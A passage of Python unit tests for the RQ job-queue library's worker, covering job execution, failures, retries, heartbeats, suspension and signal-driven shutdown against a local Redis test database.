= Worker(queues) w.register_death() w.register_birth() w.set_state(WorkerStatus.STARTED) worker = Worker.find_by_key(w.key) self.assertEqual(worker.queues, queues) self.assertEqual(worker.get_state(), WorkerStatus.STARTED) self.assertEqual(worker._job_id, None) self.assertTrue(worker.key in Worker.all_keys(worker.connection)) self.assertEqual(worker.version, VERSION) # If worker is gone, its keys should also be removed worker.connection.delete(worker.key) Worker.find_by_key(worker.key) self.assertFalse(worker.key in Worker.all_keys(worker.connection)) self.assertRaises(ValueError, Worker.find_by_key, 'foo') def test_worker_ttl(self): """Worker ttl.""" w = Worker([]) w.register_birth() [worker_key] = self.testconn.smembers(Worker.redis_workers_keys) self.assertIsNotNone(self.testconn.ttl(worker_key)) w.register_death() def test_work_via_string_argument(self): """Worker processes work fed via string arguments.""" q = Queue('foo') w = Worker([q]) job = q.enqueue('tests.fixtures.say_hello', name='Frank') self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' ) self.assertEqual(job.result, 'Hi there, Frank!') self.assertIsNone(job.worker_name) def test_job_times(self): """job times are set correctly.""" q = Queue('foo') w = Worker([q]) before = utcnow() before = before.replace(microsecond=0) job = q.enqueue(say_hello) self.assertIsNotNone(job.enqueued_at) self.assertIsNone(job.started_at) self.assertIsNone(job.ended_at) self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' ) self.assertEqual(job.result, 'Hi there, Stranger!') after = utcnow() job.refresh() self.assertTrue( before <= job.enqueued_at <= after, 'Not %s <= %s <= %s' % (before, job.enqueued_at, after) ) self.assertTrue( before <= job.started_at <= after, 'Not %s <= %s <= %s' % (before, job.started_at, after) ) self.assertTrue( before <= job.ended_at <= after, 'Not %s <= %s <= %s' % (before, job.ended_at, after) ) def test_work_is_unreadable(self): """Unreadable jobs are put on the failed job registry.""" q = Queue() self.assertEqual(q.count, 0) # NOTE: We have to fake this enqueueing for this test case. # What we're simulating here is a call to a function that is not # importable from the worker process. job = Job.create(func=div_by_zero, args=(3,), origin=q.name) job.save() job_data = job.data invalid_data = job_data.replace(b'div_by_zero', b'nonexisting') assert job_data != invalid_data self.testconn.hset(job.key, 'data', zlib.compress(invalid_data)) # We use the low-level internal function to enqueue any data (bypassing # validity checks) q.push_job_id(job.id) self.assertEqual(q.count, 1) # All set, we're going to process it w = Worker([q]) w.work(burst=True) # should silently pass self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) @mock.patch('rq.worker.logger.error') def test_deserializing_failure_is_handled(self, mock_logger_error): """ Test that exceptions are properly handled for a job that fails to deserialize. """ q = Queue() self.assertEqual(q.count, 0) # as in test_work_is_unreadable(), we create a fake bad job job = Job.create(func=div_by_zero, args=(3,), origin=q.name) job.save() # setting data to b'' ensures that pickling will completely fail job_data = job.data invalid_data = job_data.replace(b'div_by_zero', b'') assert job_data != invalid_data self.testconn.hset(job.key, 'data', zlib.compress(invalid_data)) # We use the low-level internal function to enqueue any data (bypassing # validity checks) q.push_job_id(job.id) self.assertEqual(q.count, 1) # Now we try to run the job... w = Worker([q]) job, queue = w.dequeue_job_and_maintain_ttl(10) w.perform_job(job, queue) # An exception should be logged here at ERROR level self.assertIn("Traceback", mock_logger_error.call_args[0][0]) def test_heartbeat(self): """Heartbeat saves last_heartbeat""" q = Queue() w = Worker([q]) w.register_birth() self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid'))) self.assertEqual(w.hostname, as_text(self.testconn.hget(w.key, 'hostname'))) last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat') self.assertIsNotNone(self.testconn.hget(w.key, 'birth')) self.assertTrue(last_heartbeat is not None) w = Worker.find_by_key(w.key) self.assertIsInstance(w.last_heartbeat, datetime) # worker.refresh() shouldn't fail if last_heartbeat is None # for compatibility reasons self.testconn.hdel(w.key, 'last_heartbeat') w.refresh() # worker.refresh() shouldn't fail if birth is None # for compatibility reasons self.testconn.hdel(w.key, 'birth') w.refresh() @slow def test_heartbeat_survives_lost_connection(self): with mock.patch.object(Worker, 'heartbeat') as mocked: # None -> Heartbeat is first called before the job loop mocked.side_effect = [None, redis.exceptions.ConnectionError()] q = Queue() w = Worker([q]) w.work(burst=True) # First call is prior to job loop, second raises the error, # third is successful, after "recovery" assert mocked.call_count == 3 @slow def test_heartbeat_busy(self): """Periodic heartbeats while horse is busy with long jobs""" q = Queue() w = Worker([q], job_monitoring_interval=5) for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]: job = q.enqueue(long_running_job, args=(timeout,), job_timeout=30, result_ttl=-1) with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked: w.execute_job(job, q) self.assertEqual(mocked.call_count, expected_heartbeats) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) def test_work_fails(self): """Failing jobs are put on the failed queue.""" q = Queue() self.assertEqual(q.count, 0) # Action job = q.enqueue(div_by_zero) self.assertEqual(q.count, 1) # keep for later enqueued_at_date = str(job.enqueued_at) w = Worker([q]) w.work(burst=True) # Postconditions self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) self.assertEqual(w.get_current_job_id(), None) # Check the job job = Job.fetch(job.id) self.assertEqual(job.origin, q.name) self.assertIsNone(job.worker_name) # Worker name is cleared after failures # Should be the original enqueued_at date, not the date of enqueueing # to the failed queue self.assertEqual(str(job.enqueued_at), enqueued_at_date) self.assertTrue(job.exc_info) # should contain exc_info def test_horse_fails(self): """Tests that job status is set to FAILED even if horse unexpectedly fails""" q = Queue() self.assertEqual(q.count, 0) # Action job = q.enqueue(say_hello) self.assertEqual(q.count, 1) # keep for later enqueued_at_date = str(job.enqueued_at) w = Worker([q]) with mock.patch.object(w, 'perform_job', new_callable=raise_exc_mock): w.work(burst=True) # should silently pass # Postconditions self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) self.assertEqual(w.get_current_job_id(), None) # Check the job job = Job.fetch(job.id) self.assertEqual(job.origin, q.name) # Should be the original enqueued_at date, not the date of enqueueing # to the failed queue self.assertEqual(str(job.enqueued_at), enqueued_at_date) self.assertTrue(job.exc_info) # should contain exc_info def test_statistics(self): """Successful and failed job counts are saved properly""" queue = Queue() job = queue.enqueue(div_by_zero) worker = Worker([queue]) worker.register_birth() self.assertEqual(worker.failed_job_count, 0) self.assertEqual(worker.successful_job_count, 0) self.assertEqual(worker.total_working_time, 0) registry = StartedJobRegistry(connection=worker.connection) job.started_at = utcnow() job.ended_at = job.started_at + timedelta(seconds=0.75) worker.handle_job_failure(job, queue) worker.handle_job_success(job, queue, registry) worker.refresh() self.assertEqual(worker.failed_job_count, 1) self.assertEqual(worker.successful_job_count, 1) self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds worker.handle_job_failure(job, queue) worker.handle_job_success(job, queue, registry) worker.refresh() self.assertEqual(worker.failed_job_count, 2) self.assertEqual(worker.successful_job_count, 2) self.assertEqual(worker.total_working_time, 3.0) def test_handle_retry(self): """handle_job_failure() handles retry properly""" connection = self.testconn queue = Queue(connection=connection) retry = Retry(max=2) job = queue.enqueue(div_by_zero, retry=retry) registry = FailedJobRegistry(queue=queue) worker = Worker([queue]) # If job if configured to retry, it will be put back in the queue # and not put in the FailedJobRegistry. # This is the original execution queue.empty() worker.handle_job_failure(job, queue) job.refresh() self.assertEqual(job.retries_left, 1) self.assertEqual([job.id], queue.job_ids) self.assertFalse(job in registry) # First retry queue.empty() worker.handle_job_failure(job, queue) job.refresh() self.assertEqual(job.retries_left, 0) self.assertEqual([job.id], queue.job_ids) # Second retry queue.empty() worker.handle_job_failure(job, queue) job.refresh() self.assertEqual(job.retries_left, 0) self.assertEqual([], queue.job_ids) # If a job is no longer retries, it's put in FailedJobRegistry self.assertTrue(job in registry) def test_total_working_time(self): """worker.total_working_time is stored properly""" queue = Queue() job = queue.enqueue(long_running_job, 0.05) worker = Worker([queue]) worker.register_birth() worker.perform_job(job, queue) worker.refresh() # total_working_time should be a little bit more than 0.05 seconds self.assertGreaterEqual(worker.total_working_time, 0.05) # in multi-user environments delays might be unpredictable, # please adjust this magic limit accordingly in case if It takes even longer to run self.assertLess(worker.total_working_time, 1) def test_max_jobs(self): """Worker exits after number of jobs complete.""" queue = Queue() job1 = queue.enqueue(do_nothing) job2 = queue.enqueue(do_nothing) worker = Worker([queue]) worker.work(max_jobs=1) self.assertEqual(JobStatus.FINISHED, job1.get_status()) self.assertEqual(JobStatus.QUEUED, job2.get_status()) def test_disable_default_exception_handler(self): """ Job is not moved to FailedJobRegistry when default custom exception handler is disabled. """ queue = Queue(name='default', connection=self.testconn) job = queue.enqueue(div_by_zero) worker = Worker([queue], disable_default_exception_handler=False) worker.work(burst=True) registry = FailedJobRegistry(queue=queue) self.assertTrue(job in registry) # Job is not added to FailedJobRegistry if # disable_default_exception_handler is True job = queue.enqueue(div_by_zero) worker = Worker([queue], disable_default_exception_handler=True) worker.work(burst=True) self.assertFalse(job in registry) def test_custom_exc_handling(self): """Custom exception handling.""" def first_handler(job, *exc_info): job.meta = {'first_handler': True} job.save_meta() return True def second_handler(job, *exc_info): job.meta.update({'second_handler': True}) job.save_meta() def black_hole(job, *exc_info): # Don't fall through to default behaviour (moving to failed queue) return False q = Queue() self.assertEqual(q.count, 0) job = q.enqueue(div_by_zero) w = Worker([q], exception_handlers=first_handler) w.work(burst=True) # Check the job job.refresh() self.assertEqual(job.is_failed, True) self.assertTrue(job.meta['first_handler']) job = q.enqueue(div_by_zero) w = Worker([q], exception_handlers=[first_handler, second_handler]) w.work(burst=True) # Both custom exception handlers are run job.refresh() self.assertEqual(job.is_failed, True) self.assertTrue(job.meta['first_handler']) self.assertTrue(job.meta['second_handler']) job = q.enqueue(div_by_zero) w = Worker([q], exception_handlers=[first_handler, black_hole, second_handler]) w.work(burst=True) # second_handler is not run since it's interrupted by black_hole job.refresh() self.assertEqual(job.is_failed, True) self.assertTrue(job.meta['first_handler']) self.assertEqual(job.meta.get('second_handler'), None) def test_cancelled_jobs_arent_executed(self): """Cancelling jobs.""" SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa try: # Remove the sentinel if it is leftover from a previous test run os.remove(SENTINEL_FILE) except OSError as e: if e.errno != 2: raise q = Queue() job = q.enqueue(create_file, SENTINEL_FILE) # Here, we cancel the job, so the sentinel file may not be created self.testconn.delete(job.key) w = Worker([q]) w.work(burst=True) assert q.count == 0 # Should not have created evidence of execution self.assertEqual(os.path.exists(SENTINEL_FILE), False) @slow # noqa def test_timeouts(self): """Worker kills jobs after timeout.""" sentinel_file = '/tmp/.rq_sentinel' q = Queue() w = Worker([q]) # Put it on the queue with a timeout value res = q.enqueue(create_file_after_timeout, args=(sentinel_file, 4), job_timeout=1) try: os.unlink(sentinel_file) except OSError as e: if e.errno == 2: pass self.assertEqual(os.path.exists(sentinel_file), False) w.work(burst=True) self.assertEqual(os.path.exists(sentinel_file), False) # TODO: Having to do the manual refresh() here is really ugly! res.refresh() self.assertIn('JobTimeoutException', as_text(res.exc_info)) def test_worker_sets_result_ttl(self): """Ensure that Worker properly sets result_ttl for individual jobs.""" q = Queue() job = q.enqueue(say_hello, args=('Frank',), result_ttl=10) w = Worker([q]) self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) w.work(burst=True) self.assertNotEqual(self.testconn.ttl(job.key), 0) self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) # Job with -1 result_ttl don't expire job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1) w = Worker([q]) self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) w.work(burst=True) self.assertEqual(self.testconn.ttl(job.key), -1) self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) # Job with result_ttl = 0 gets deleted immediately job = q.enqueue(say_hello, args=('Frank',), result_ttl=0) w = Worker([q]) self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) w.work(burst=True) self.assertEqual(self.testconn.get(job.key), None) self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) def test_worker_sets_job_status(self): """Ensure that worker correctly sets job status.""" q = Queue() w = Worker([q]) job = q.enqueue(say_hello) self.assertEqual(job.get_status(), JobStatus.QUEUED) self.assertEqual(job.is_queued, True) self.assertEqual(job.is_finished, False) self.assertEqual(job.is_failed, False) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) self.assertEqual(job.is_queued, False) self.assertEqual(job.is_finished, True) self.assertEqual(job.is_failed, False) # Failed jobs should set status to "failed" job = q.enqueue(div_by_zero, args=(1,)) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FAILED) self.assertEqual(job.is_queued, False) self.assertEqual(job.is_finished, False) self.assertEqual(job.is_failed, True) def test_job_dependency(self): """Enqueue dependent jobs only if their parents don't fail""" q = Queue() w = Worker([q]) parent_job = q.enqueue(say_hello, result_ttl=0) job = q.enqueue_call(say_hello, depends_on=parent_job) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) parent_job = q.enqueue(div_by_zero) job = q.enqueue_call(say_hello, depends_on=parent_job) w.work(burst=True) job = Job.fetch(job.id) self.assertNotEqual(job.get_status(), JobStatus.FINISHED) def test_get_current_job(self): """Ensure worker.get_current_job() works properly""" q = Queue() worker = Worker([q]) job = q.enqueue_call(say_hello) self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None) worker.set_current_job_id(job.id) self.assertEqual( worker.get_current_job_id(), as_text(self.testconn.hget(worker.key, 'current_job')) ) self.assertEqual(worker.get_current_job(), job) def test_custom_job_class(self): """Ensure Worker accepts custom job class.""" q = Queue() worker = Worker([q], job_class=CustomJob) self.assertEqual(worker.job_class, CustomJob) def test_custom_queue_class(self): """Ensure Worker accepts custom queue class.""" q = CustomQueue() worker = Worker([q], queue_class=CustomQueue) self.assertEqual(worker.queue_class, CustomQueue) def test_custom_queue_class_is_not_global(self): """Ensure Worker custom queue class is not global.""" q = CustomQueue() worker_custom = Worker([q], queue_class=CustomQueue) q_generic = Queue() worker_generic = Worker([q_generic]) self.assertEqual(worker_custom.queue_class, CustomQueue) self.assertEqual(worker_generic.queue_class, Queue) self.assertEqual(Worker.queue_class, Queue) def test_custom_job_class_is_not_global(self): """Ensure Worker custom job class is not global.""" q = Queue() worker_custom = Worker([q], job_class=CustomJob) q_generic = Queue() worker_generic = Worker([q_generic]) self.assertEqual(worker_custom.job_class, CustomJob) self.assertEqual(worker_generic.job_class, Job) self.assertEqual(Worker.job_class, Job) def test_work_via_simpleworker(self): """Worker processes work, with forking disabled, then returns.""" fooq, barq = Queue('foo'), Queue('bar') w = SimpleWorker([fooq, barq]) self.assertEqual(w.work(burst=True), False, 'Did not expect any work on the queue.') job = fooq.enqueue(say_pid) self.assertEqual(w.work(burst=True), True, 'Expected at least some work done.') self.assertEqual(job.result, os.getpid(), 'PID mismatch, fork() is not supposed to happen here') def test_simpleworker_heartbeat_ttl(self): """SimpleWorker's key must last longer than job.timeout when working""" queue = Queue('foo') worker = SimpleWorker([queue]) job_timeout = 300 job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout) worker.work(burst=True) job.refresh() self.assertGreater(job.meta['ttl'], job_timeout) def test_prepare_job_execution(self): """Prepare job execution does the necessary bookkeeping.""" queue = Queue(connection=self.testconn) job = queue.enqueue(say_hello) worker = Worker([queue]) worker.prepare_job_execution(job) # Updates working queue registry = StartedJobRegistry(connection=self.testconn) self.assertEqual(registry.get_job_ids(), [job.id]) # Updates worker statuses self.assertEqual(worker.get_state(), 'busy') self.assertEqual(worker.get_current_job_id(), job.id) # job status is also updated self.assertEqual(job._status, JobStatus.STARTED) self.assertEqual(job.worker_name, worker.name) def test_work_unicode_friendly(self): """Worker processes work with unicode description, then quits.""" q = Queue('foo') w = Worker([q]) job = q.enqueue('tests.fixtures.say_hello', name='Adam', description='你好 世界!') self.assertEqual(w.work(burst=True), True, 'Expected at least some work done.') self.assertEqual(job.result, 'Hi there, Adam!') self.assertEqual(job.description, '你好 世界!') def test_work_log_unicode_friendly(self): """Worker process work with unicode or str other than pure ascii content, logging work properly""" q = Queue("foo") w = Worker([q]) job = q.enqueue('tests.fixtures.say_hello', name='阿达姆', description='你好 世界!') w.work(burst=True) self.assertEqual(job.get_status(), JobStatus.FINISHED) job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆', description='你好 世界!') w.work(burst=True) self.assertEqual(job.get_status(), JobStatus.FINISHED) def test_suspend_worker_execution(self): """Test Pause Worker Execution""" SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa try: # Remove the sentinel if it is leftover from a previous test run os.remove(SENTINEL_FILE) except OSError as e: if e.errno != 2: raise q = Queue() q.enqueue(create_file, SENTINEL_FILE) w = Worker([q]) suspend(self.testconn) w.work(burst=True) assert q.count == 1 # Should not have created evidence of execution self.assertEqual(os.path.exists(SENTINEL_FILE), False) resume(self.testconn) w.work(burst=True) assert q.count == 0 self.assertEqual(os.path.exists(SENTINEL_FILE), True) @slow def test_suspend_with_duration(self): q = Queue() for _ in range(5): q.enqueue(do_nothing) w = Worker([q]) # This suspends workers for working for 2 second suspend(self.testconn, 2) # So when this burst of work happens the queue should remain at 5 w.work(burst=True) assert q.count == 5 sleep(3) # The suspension should be expired now, and a burst of work should now clear the queue w.work(burst=True) assert q.count == 0 def test_worker_hash_(self): """Workers are hashed by their .name attribute""" q = Queue('foo') w1 = Worker([q], name="worker1") w2 = Worker([q], name="worker2") w3 = Worker([q], name="worker1") worker_set = set([w1, w2, w3]) self.assertEqual(len(worker_set), 2) def test_worker_sets_birth(self): """Ensure worker correctly sets worker birth date.""" q = Queue() w = Worker([q]) w.register_birth() birth_date = w.birth_date self.assertIsNotNone(birth_date) self.assertEqual(type(birth_date).__name__, 'datetime') def test_worker_sets_death(self): """Ensure worker correctly sets worker death date.""" q = Queue() w = Worker([q]) w.register_death() death_date = w.death_date self.assertIsNotNone(death_date) self.assertIsInstance(death_date, datetime) def test_clean_queue_registries(self): """worker.clean_registries sets last_cleaned_at and cleans registries.""" foo_queue = Queue('foo', connection=self.testconn) foo_registry = StartedJobRegistry('foo', connection=self.testconn) self.testconn.zadd(foo_registry.key, {'foo': 1}) self.assertEqual(self.testconn.zcard(foo_registry.key), 1) bar_queue = Queue('bar', connection=self.testconn) bar_registry = StartedJobRegistry('bar', connection=self.testconn) self.testconn.zadd(bar_registry.key, {'bar': 1}) self.assertEqual(self.testconn.zcard(bar_registry.key), 1) worker = Worker([foo_queue, bar_queue]) self.assertEqual(worker.last_cleaned_at, None) worker.clean_registries() self.assertNotEqual(worker.last_cleaned_at, None) self.assertEqual(self.testconn.zcard(foo_registry.key), 0) self.assertEqual(self.testconn.zcard(bar_registry.key), 0) # worker.clean_registries() only runs once every 15 minutes # If we add another key, calling clean_registries() should do nothing self.testconn.zadd(bar_registry.key, {'bar': 1}) worker.clean_registries() self.assertEqual(self.testconn.zcard(bar_registry.key), 1) def test_should_run_maintenance_tasks(self): """Workers should run maintenance tasks on startup and every hour.""" queue = Queue(connection=self.testconn) worker = Worker(queue) self.assertTrue(worker.should_run_maintenance_tasks) worker.last_cleaned_at = utcnow() self.assertFalse(worker.should_run_maintenance_tasks) worker.last_cleaned_at = utcnow() - timedelta(seconds=3700) self.assertTrue(worker.should_run_maintenance_tasks) def test_worker_calls_clean_registries(self): """Worker calls clean_registries when run.""" queue = Queue(connection=self.testconn) registry = StartedJobRegistry(connection=self.testconn) self.testconn.zadd(registry.key, {'foo': 1}) worker = Worker(queue, connection=self.testconn) worker.work(burst=True) self.assertEqual(self.testconn.zcard(registry.key), 0) def test_job_dependency_race_condition(self): """Dependencies added while the job gets finished shouldn't get lost.""" # This patches the enqueue_dependents to enqueue a new dependency AFTER # the original code was executed. orig_enqueue_dependents = Queue.enqueue_dependents def new_enqueue_dependents(self, job, *args, **kwargs): orig_enqueue_dependents(self, job, *args, **kwargs) if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id: Queue._add_enqueue = None Queue().enqueue_call(say_hello, depends_on=job) Queue.enqueue_dependents = new_enqueue_dependents q = Queue() w = Worker([q]) with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked: parent_job = q.enqueue(say_hello, result_ttl=0) Queue._add_enqueue = parent_job job = q.enqueue_call(say_hello, depends_on=parent_job) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) # The created spy checks two issues: # * before the fix of #739, 2 of the 3 jobs where executed due # to the race condition # * during the development another issue was fixed: # due to a missing pipeline usage in Queue.enqueue_job, the job # which was enqueued before the "rollback" was executed twice. # So before that fix the call count was 4 instead of 3 self.assertEqual(mocked.call_count, 3) def test_self_modification_persistence(self): """Make sure that any meta modification done by the job itself persists completely through the queue/worker/job stack.""" q = Queue() # Also make sure that previously existing metadata # persists properly job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42}, args=[{'baz': 10, 'newinfo': 'waka'}]) w = Worker([q]) w.work(burst=True) job_check = Job.fetch(job.id) self.assertEqual(job_check.meta['foo'], 'bar') self.assertEqual(job_check.meta['baz'], 10) self.assertEqual(job_check.meta['newinfo'], 'waka') def test_self_modification_persistence_with_error(self): """Make sure that any meta modification done by the job itself persists completely through the queue/worker/job stack -- even if the job errored""" q = Queue() # Also make sure that previously existing metadata # persists properly job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42}, args=[{'baz': 10, 'newinfo': 'waka'}]) w = Worker([q]) w.work(burst=True) # Postconditions self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) self.assertEqual(w.get_current_job_id(), None) job_check = Job.fetch(job.id) self.assertEqual(job_check.meta['foo'], 'bar') self.assertEqual(job_check.meta['baz'], 10) self.assertEqual(job_check.meta['newinfo'], 'waka') @mock.patch('rq.worker.logger.info') def test_log_result_lifespan_true(self, mock_logger_info): """Check that log_result_lifespan True causes job lifespan to be logged.""" q = Queue() w = Worker([q]) job = q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.perform_job(job, q) mock_logger_info.assert_called_with('Result is kept for %s seconds', 10) self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list]) @mock.patch('rq.worker.logger.info') def test_log_result_lifespan_false(self, mock_logger_info): """Check that log_result_lifespan False causes job lifespan to not be logged.""" q = Queue() class TestWorker(Worker): log_result_lifespan = False w = TestWorker([q]) job = q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.perform_job(job, q) self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list]) @mock.patch('rq.worker.logger.info') def test_log_job_description_true(self, mock_logger_info): """Check that log_job_description True causes job lifespan to be logged.""" q = Queue() w = Worker([q]) q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.dequeue_job_and_maintain_ttl(10) self.assertIn("Frank", mock_logger_info.call_args[0][2]) @mock.patch('rq.worker.logger.info') def test_log_job_description_false(self, mock_logger_info): """Check that log_job_description False causes job lifespan to not be logged.""" q = Queue() w = Worker([q], log_job_description=False) q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.dequeue_job_and_maintain_ttl(10) self.assertNotIn("Frank", mock_logger_info.call_args[0][2]) def test_worker_version(self): q = Queue() w = Worker([q]) w.version = '0.0.0' w.register_birth() self.assertEqual(w.version, '0.0.0') w.refresh() self.assertEqual(w.version, '0.0.0') # making sure that version is preserved when worker is retrieved by key worker = Worker.find_by_key(w.key) self.assertEqual(worker.version, '0.0.0') def test_python_version(self): python_version = sys.version q = Queue() w = Worker([q]) w.register_birth() self.assertEqual(w.python_version, python_version) # now patching version python_version = 'X.Y.Z.final' # dummy version self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless w2 = Worker([q]) w2.python_version = python_version w2.register_birth() self.assertEqual(w2.python_version, python_version) # making sure that version is preserved when worker is retrieved by key worker = Worker.find_by_key(w2.key) self.assertEqual(worker.python_version, python_version) def wait_and_kill_work_horse(pid, time_to_wait=0.0): time.sleep(time_to_wait) os.kill(pid, signal.SIGKILL) class TimeoutTestCase: def setUp(self): # we want tests to fail if signal are ignored and the work remain # running, so set a signal to kill them after X seconds self.killtimeout = 15 signal.signal(signal.SIGALRM, self._timeout) signal.alarm(self.killtimeout) def _timeout(self, signal, frame): raise AssertionError( "test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout ) class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase): @slow def test_idle_worker_warm_shutdown(self): """worker with no ongoing job receiving single SIGTERM signal and shutting down""" w = Worker('foo') self.assertFalse(w._stop_requested) p = Process(target=kill_worker, args=(os.getpid(), False)) p.start() w.work() p.join(1) self.assertFalse(w._stop_requested) @slow def test_working_worker_warm_shutdown(self): """worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down""" fooq = Queue('foo') w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_warm' fooq.enqueue(create_file_after_timeout, sentinel_file, 2) self.assertFalse(w._stop_requested) p = Process(target=kill_worker, args=(os.getpid(), False)) p.start() w.work() p.join(2) self.assertFalse(p.is_alive()) self.assertTrue(w._stop_requested) self.assertTrue(os.path.exists(sentinel_file)) self.assertIsNotNone(w.shutdown_requested_date) self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime') @slow def test_working_worker_cold_shutdown(self): """Busy worker shuts down immediately on double SIGTERM signal""" fooq = Queue('foo') w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_cold' fooq.enqueue(create_file_after_timeout, sentinel_file, 2) self.assertFalse(w._stop_requested) p = Process(target=kill_worker, args=(os.getpid(), True)) p.start() self.assertRaises(SystemExit, w.work) p.join(1) self.assertTrue(w._stop_requested) self.assertFalse(os.path.exists(sentinel_file)) shutdown_requested_date = w.shutdown_requested_date self.assertIsNotNone(shutdown_requested_date) self.assertEqual(type(shutdown_requested_date).__name__, 'datetime') @slow def test_work_horse_death_sets_job_failed(self): """worker with an ongoing job whose work horse dies unexpectadly (before completing the job) should set the job's status to FAILED """ fooq = Queue('foo') self.assertEqual(fooq.count, 0) w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_work_horse_death' if os.path.exists(sentinel_file): os.remove(sentinel_file) fooq.enqueue(create_file_after_timeout, sentinel_file, 100) job, queue = w.dequeue_job_and_maintain_ttl(5) w.fork_work_horse(job, queue) p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5)) p.start() w.monitor_work_horse(job, queue) job_status = job.get_status() p.join(1) self.assertEqual(job_status, JobStatus.FAILED) failed_job_registry = FailedJobRegistry(queue=fooq) self.assertTrue(job in failed_job_registry) self.assertEqual(fooq.count, 0) @slow def test_work_horse_force_death(self): """Simulate a frozen worker that doesn't observe the timeout properly. Fake it by artificially setting the timeout of the parent process to something much smaller after the process is already forked. """ fooq = Queue('foo') self.assertEqual(fooq.count, 0) w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_work_horse_death' if os.path.exists(sentinel_file): os.remove(sentinel_file) fooq.enqueue(launch_process_within_worker_and_store_pid, sentinel_file, 100) job, queue = w.dequeue_job_and_maintain_ttl(5) w.fork_work_horse(job, queue) job.timeout = 5 w.job_monitoring_interval = 1 now = utcnow() time.sleep(1) with open(sentinel_file) as f: subprocess_pid = int(f.read().strip()) self.assertTrue(psutil.pid_exists(subprocess_pid)) w.monitor_work_horse(job, queue) fudge_factor = 1 total_time = w.job_monitoring_interval + 65 + fudge_factor self.assertTrue((utcnow() - now).total_seconds() < total_time) self.assertEqual(job.get_status(), JobStatus.FAILED) failed_job_registry = FailedJobRegistry(queue=fooq) self.assertTrue(job in failed_job_registry) self.assertEqual(fooq.count, 0) self.assertFalse(psutil.pid_exists(subprocess_pid)) def schedule_access_self(): q = Queue('default', connection=get_current_connection()) q.enqueue(access_self) @pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X') class TestWorkerSubprocess(RQTestCase): def setUp(self): super(TestWorkerSubprocess, self).setUp() db_num = self.testconn.connection_pool.connection_kwargs['db'] self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num def test_run_empty_queue(self): """Run the worker in its own process with an empty queue""" subprocess.check_call(['rqworker', '-u', self.redis_url, '-b']) def test_run_access_self(self): """Schedule a job, then run the worker as subprocess""" q = Queue() job = q.enqueue(access_self) subprocess.check_call(['rqworker', '-u', self.redis_url, '-b']) registry = FinishedJobRegistry(queue=q) self.assertTrue(job in registry) assert q.count == 0 @skipIf('pypy' in sys.version.lower(), 'often times out with pypy') def test_run_scheduled_access_self(self): """Schedule a job that schedules a job, then run the worker as subprocess""" q = Queue() job = q.enqueue(schedule_access_self) subprocess.check_call(['rqworker', '-u', self.redis_url, '-b']) registry = FinishedJobRegistry(queue=q) self.assertTrue(job in registry) assert q.count == 0 @pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals') @skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy') class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase): def setUp(self): super(HerokuWorkerShutdownTestCase, self).setUp() self.sandbox = '/tmp/rq_shutdown/' os.makedirs(self.sandbox) def tearDown(self): shutil.rmtree(self.sandbox, ignore_errors=True) @slow def test_immediate_shutdown(self): """Heroku work horse shutdown with immediate (0 second) kill""" p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0)) p.start() time.sleep(0.5) os.kill(p.pid, signal.SIGRTMIN) p.join(2) self.assertEqual(p.exitcode, 1) 